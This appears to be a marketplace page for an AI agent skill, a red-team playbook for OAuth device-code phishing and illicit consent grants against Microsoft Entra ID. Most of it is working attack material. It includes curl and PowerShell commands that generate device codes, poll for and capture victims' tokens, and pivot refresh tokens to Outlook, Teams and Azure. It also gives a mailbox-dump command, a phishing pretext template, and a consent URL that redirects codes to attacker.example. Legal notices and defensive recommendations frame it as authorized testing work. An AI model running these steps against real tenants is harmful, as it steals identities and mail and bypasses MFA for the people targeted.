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Attacking OAuth with Device-Code Phishing

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Simulate OAuth phishing attacks against Microsoft Entra ID.

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What Attacking OAuth with Device-Code Phishing does

This skill enables authorized security professionals to conduct OAuth 2.0 device-code phishing attacks specifically targeting Microsoft Entra ID. By leveraging the device authorization grant mechanism, attackers can manipulate the flow to steal access and refresh tokens from unsuspecting users. The skill is designed for red-team engagements where explicit permission is granted to test the security posture of a tenant. It combines techniques for both device-code phishing and illicit consent grants, allowing users to demonstrate the risks associated with these vulnerabilities.

The OAuth 2.0 Device Authorization Grant is typically used for devices that lack a browser interface, such as smart TVs. In this context, the attacker masquerades as the legitimate device, prompting the victim to enter a user code on the genuine Microsoft device login page. This method effectively bypasses multi-factor authentication (MFA) since the victim completes the authentication process, allowing the attacker to capture valid tokens. The skill also includes capabilities to exploit the illicit consent grant, where attackers can trick users into granting permissions to malicious applications, thereby gaining persistent access to sensitive resources.

The skill is particularly relevant for organizations aiming to validate their security measures against real-world phishing techniques. It assists in testing Conditional Access policies, MFA enforcement, and the effectiveness of token protection controls. Additionally, it provides a framework for demonstrating the potential impact of MFA-bypass attacks and the necessity for phishing-resistant authentication methods. By documenting the outcomes of these tests, security teams can produce actionable remediation recommendations to enhance their defenses against such attacks.

Overall, this skill is a valuable tool for security professionals looking to simulate and understand the implications of OAuth phishing attacks in a controlled environment, ensuring that organizations can proactively address these vulnerabilities before they are exploited by malicious actors.

When to use it

Use this skill during authorized red-team engagements to simulate phishing attacks against Microsoft 365 and validate security controls.

When not to use it

This skill should not be used in unauthorized environments or without explicit written permission, as it involves sensitive security testing.

What you can build with it

Red-Team Engagements

Use this skill to conduct authorized red-team engagements that simulate phishing attacks against Microsoft 365.

Testing Security Controls

Validate the effectiveness of Conditional Access policies and MFA enforcement by executing realistic phishing scenarios.

Demonstrating MFA Risks

Showcase the risks associated with MFA bypass to advocate for stronger authentication measures within the organization.

How to install Attacking OAuth with Device-Code Phishing

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Inside SKILL.md

Written by mukul975

Attacking OAuth with Device-Code Phishing

Legal Notice: This skill is for authorized security testing, red-team engagements, and educational purposes only. Device-code and consent-grant phishing manipulate real users into authorizing attacker-controlled access to corporate identities. Execute only against tenants you own or have explicit written authorization (rules of engagement) to test. Unauthorized use violates the Computer Fraud and Abuse Act and equivalent laws worldwide.

Overview

The OAuth 2.0 Device Authorization Grant (RFC 8628) was designed for input-constrained devices (smart TVs, CLI tools) that cannot easily present a browser-based login. A device requests a short user_code and a device_code, displays the user_code and a verification URL to the user, and polls the token endpoint while the user authenticates on a separate, fully-featured device. Attackers weaponize this flow: instead of a smart TV, the "device" is the attacker's machine. The attacker initiates the device-code request, then phishes a victim to visit the legitimate Microsoft verification page (https://microsoft.com/devicelogin) and enter the attacker-generated user_code. Because the victim authenticates on the genuine Microsoft login page — completing MFA — the resulting tokens are minted to the attacker's polling session. This bypasses MFA entirely: the second factor is satisfied by the victim, but the bearer tokens land with the attacker (mapped to MITRE ATT&CK T1528 – Steal Application Access Token).

Microsoft Threat Intelligence, Volexity, and Proofpoint documented sharp growth in device-code phishing through 2025, with Russia-aligned actors (tracked by Microsoft as Storm-2372) among the most prolific. Mandiant's M-Trends reporting similarly highlights OAuth token theft as a leading cloud initial-access vector. A closely related technique is the illicit consent grant ("OAuth phishing"): the attacker registers a multi-tenant app and tricks the victim into clicking an /adminconsent or user-consent URL, granting the malicious app delegated Microsoft Graph permissions (Mail.Read, Files.ReadWrite.All, offline_access) that persist independently of password resets. This skill covers both, plus token replay across Microsoft 365 services using TokenTactics and validation/access mapping with ROADtools.

The defining property red teams exploit: access tokens minted via the device-code flow are valid for roughly 60–90 minutes, but the accompanying refresh token (with offline_access scope) survives for up to 90 days and can be redeemed for fresh tokens against any first-party resource the client is allowed to request — Outlook, SharePoint, Teams, Azure Resource Manager — enabling durable, MFA-surviving access.

When to Use

  • During an authorized red-team or assumed-breach engagement targeting Microsoft 365 / Entra ID where social-engineering is in scope
  • When validating Conditional Access policies, MFA enforcement, and token-protection controls against real phishing techniques
  • When testing whether an organization restricts the OAuth device-code flow or blocks unverified multi-tenant app consent
  • When demonstrating MFA-bypass risk to justify phishing-resistant authentication (FIDO2) and token-binding controls
  • When building detections (paired with the blue-team hunting-saas-sso-token-abuse skill) and you need realistic telemetry

Prerequisites

  • Written authorization / rules of engagement explicitly permitting phishing and token theft against the target tenant
  • A controlled pretext-delivery channel (sanctioned phishing infrastructure or an internal test mailbox)
  • Linux or Windows attacker host with Python 3.8+ and PowerShell 7+
  • TokenTactics (PowerShell) and ROADtools (Python) installed:
    # ROADtools (roadrecon + roadtx) — Dirk-jan Mollema / Outsider Security
    pip install roadtools roadtools_auth
    # roadtx (ROADtools Token eXchange) ships in roadtools_auth
    roadtx --help
    
    # TokenTactics v2 (rvrsh3ll)
    git clone https://github.com/rvrsh3ll/TokenTactics.git
    pwsh -c "Import-Module ./TokenTactics/TokenTactics.psd1"
    
  • Familiarity with OAuth 2.0 grant types, JWT structure, and Microsoft Graph scopes

Objectives

  • Initiate an OAuth device-code request against Entra ID using a first-party client ID
  • Deliver a credible pretext that drives the victim to the genuine Microsoft device-login page
  • Poll the token endpoint and capture the victim's access and refresh tokens
  • Refresh tokens across Microsoft 365 resources (Graph, Outlook, Azure management) to expand access
  • Execute the illicit-consent variant by registering and phishing consent for a malicious multi-tenant app
  • Enumerate accessible resources and data with ROADtools to demonstrate impact
  • Document MFA bypass and produce remediation recommendations

MITRE ATT&CK Mapping

IDTechniqueApplication in this skill
T1528Steal Application Access TokenPhishing the device-code flow / consent grant yields attacker-controlled OAuth access and refresh tokens that are reused to access cloud services without re-authenticating

Related techniques frequently chained: T1566 Phishing (delivery), T1550.001 Application Access Token (replaying stolen tokens), T1098.003 Account Manipulation: Additional Cloud Roles (consent grant persistence).

Workflow

Phase 1: Initiate the Device-Code Request

The attacker requests a device code from Entra ID, choosing a first-party client that the victim implicitly trusts. The Microsoft Office client ID d3590ed6-52b3-4102-aeff-aad2292ab01c is commonly used because it is pre-authorized for broad first-party resources.

  1. Request a device code directly via the token endpoint:

    # client_id = Microsoft Office; scope requests offline_access for a long-lived refresh token
    curl -s -X POST \
      'https://login.microsoftonline.com/organizations/oauth2/v2.0/devicecode' \
      -d 'client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c' \
      -d 'scope=https://graph.microsoft.com/.default offline_access' | tee devicecode.json
    
  2. The JSON response contains the fields you weaponize:

    {
      "user_code": "B7HVQXKZ2",
      "device_code": "GMMhmHCXhWEzkobqIHGG_EnNYYsAkukHspeYUk9E8...",
      "verification_uri": "https://microsoft.com/devicelogin",
      "expires_in": 900,
      "interval": 5,
      "message": "To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code B7HVQXKZ2 to authenticate."
    }
    
  3. Note the 15-minute (expires_in: 900) validity window — the pretext must drive the victim to authenticate quickly.

    Equivalent using TokenTactics (handles polling automatically):

    Import-Module ./TokenTactics/TokenTactics.psd1
    # Generates a device code and begins polling; prints the user_code to phish
    Get-AzureToken -Client MSGraph
    

Phase 2: Deliver the Pretext

The phishing message must NOT contain a credential-harvesting link — the victim authenticates on the real Microsoft page, which is what defeats user suspicion and MFA.

  1. Craft a pretext that references the genuine https://microsoft.com/devicelogin URL and the user_code (e.g., "IT is enrolling your account in the new Teams Rooms device; open microsoft.com/devicelogin and enter code B7HVQXKZ2 within 15 minutes").
  2. Send through sanctioned phishing infrastructure. Hyperlinked codes/URLs frequently land in spam, so present the URL and code as plain text.
  3. Time delivery to the start of a polling cycle so the code is fresh.

Phase 3: Poll and Capture Tokens

While the victim authenticates and approves, poll the token endpoint with the device_code until tokens are issued.

  1. Poll at the server-specified interval (5 seconds); authorization_pending is expected until the victim completes sign-in:
    DEVICE_CODE=$(python -c "import json;print(json.load(open('devicecode.json'))['device_code'])")
    while true; do
      RESP=$(curl -s -X POST \
        'https://login.microsoftonline.com/organizations/oauth2/v2.0/token' \
        -d 'grant_type=urn:ietf:params:oauth:grant-type:device_code' \
        -d 'client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c' \
        -d "device_code=${DEVICE_CODE}")
      echo "$RESP" | grep -q access_token && { echo "$RESP" > tokens.json; break; }
      echo "$RESP" | grep -q authorization_pending || echo "$RESP"
      sleep 5
    done
    
  2. On success the response yields access_token, refresh_token, id_token, expires_in, and the granted scope.
  3. Decode the access token to confirm the captured identity, audience, and scopes:
    python -c "import json,base64;p=json.load(open('tokens.json'))['access_token'].split('.')[1];print(json.loads(base64.urlsafe_b64decode(p+'=='*(-len(p)%4))))"
    

Phase 4: Refresh Across Microsoft 365 Resources

The refresh token (with offline_access) can be redeemed for tokens scoped to other first-party resources, expanding access beyond the original scope.

  1. Use TokenTactics refresh functions to pivot the refresh token to specific services:
    # $response holds the device-code result from Get-AzureToken
    $rt = $response.refresh_token
    Invoke-RefreshToOutlookToken          -domain target.com -refreshToken $rt   # mailbox access
    Invoke-RefreshToMSGraphToken          -domain target.com -refreshToken $rt   # Graph
    Invoke-RefreshToMSTeamsToken          -domain target.com -refreshToken $rt   # Teams
    Invoke-RefreshToAzureCoreManagementToken -domain target.com -refreshToken $rt # ARM
    Invoke-RefreshToSubstrateToken        -domain target.com -refreshToken $rt
    
  2. Equivalently with roadtx, redeem the refresh token for a new resource:
    roadtx refreshtokento \
      -r "$(python -c "import json;print(json.load(open('tokens.json'))['refresh_token'])")" \
      -c d3590ed6-52b3-4102-aeff-aad2292ab01c \
      -s https://graph.microsoft.com/.default
    
  3. Demonstrate mailbox access to prove impact (read-only, scoped to engagement rules):
    Invoke-DumpOWAMailboxViaMSGraphApi -AccessToken $response.access_token -mailFolder Inbox
    

Phase 5: Illicit Consent Grant Variant

Instead of device-code, register a malicious multi-tenant app and phish the victim to consent to delegated Graph permissions for durable, password-reset-surviving access.

  1. Register a multi-tenant app in an attacker tenant requesting delegated scopes such as Mail.Read, Files.ReadWrite.All, offline_access.
  2. Build a user-consent URL and phish it:
    https://login.microsoftonline.com/common/oauth2/v2.0/authorize?
      client_id=<ATTACKER_APP_ID>
      &response_type=code
      &redirect_uri=https://attacker.example/callback
      &response_mode=query
      &scope=offline_access%20Mail.Read%20Files.ReadWrite.All
      &state=12345
    
  3. When the victim consents, exchange the returned code for tokens:
    curl -s -X POST 'https://login.microsoftonline.com/common/oauth2/v2.0/token' \
      -d 'client_id=<ATTACKER_APP_ID>' \
      -d 'grant_type=authorization_code' \
      -d 'code=<AUTH_CODE>' \
      -d 'redirect_uri=https://attacker.example/callback' \
      -d 'client_secret=<APP_SECRET>' \
      -d 'scope=offline_access Mail.Read Files.ReadWrite.All'
    
  4. The consented OAuth grant persists as a service-principal grant in the victim tenant until an admin revokes it (Remove-MgServicePrincipalOauth2PermissionGrant).

Phase 6: Enumerate Impact with ROADtools

  1. Authenticate roadrecon with the captured token / refresh token and dump the directory:
    roadrecon auth --refresh-token "$(python -c "import json;print(json.load(open('tokens.json'))['refresh_token'])")" \
      -c d3590ed6-52b3-4102-aeff-aad2292ab01c
    roadrecon gather
    roadrecon gui   # browse users, groups, app registrations, role assignments
    
  2. Identify high-value access: role assignments, owned applications, accessible SharePoint sites, and additional consent grants.
  3. Record exactly what data and roles the stolen tokens reached for the engagement report.

Tools and Resources

ToolPurposeSource
TokenTactics v2Generate device codes and refresh tokens across M365 serviceshttps://github.com/rvrsh3ll/TokenTactics
ROADtools (roadrecon / roadtx)Token exchange, directory enumeration, access mappinghttps://github.com/dirkjanm/ROADtools
AADInternalsEntra ID attack/recon PowerShell toolkithttps://github.com/Gerenios/AADInternals
RFC 8628OAuth 2.0 Device Authorization Grant specificationhttps://datatracker.ietf.org/doc/html/rfc8628
Microsoft / Storm-2372 advisoryDevice-code phishing campaign analysishttps://www.microsoft.com/en-us/security/blog/
Mandiant M-TrendsOAuth token theft trend reportinghttps://cloud.google.com/security/resources/m-trends

Defensive Recommendations

ControlEffect
Conditional Access policy blocking the device-code flow (authenticationFlows) for users who do not need itRemoves the attack surface for most users
Phishing-resistant MFA (FIDO2 / passkeys) + token protection (token binding)Bound tokens cannot be replayed off the victim device
Restrict user consent to verified publishers / require admin consentBlocks illicit-consent grants
Sign-in frequency + shorter session lifetimes on untrusted networksLimits refresh-token longevity
Monitor AADNonInteractiveUserSignInLogs for device-code grants and anomalous token useDetection (see hunting-saas-sso-token-abuse)

Validation Criteria

  • Device-code request returned a valid user_code and device_code
  • Pretext delivered referencing the genuine Microsoft device-login page (no harvesting link)
  • Token endpoint polled and access_token + refresh_token captured
  • Access token decoded to confirm captured identity, audience, and scopes
  • Refresh token successfully exchanged for at least one additional M365 resource
  • MFA bypass demonstrated (victim completed MFA; attacker holds usable tokens)
  • Illicit-consent variant tested or documented as out of scope
  • Accessible resources enumerated with ROADtools and recorded
  • Remediation recommendations (CA device-code block, FIDO2, consent restrictions) delivered

Frequently asked questions about Attacking OAuth with Device-Code Phishing

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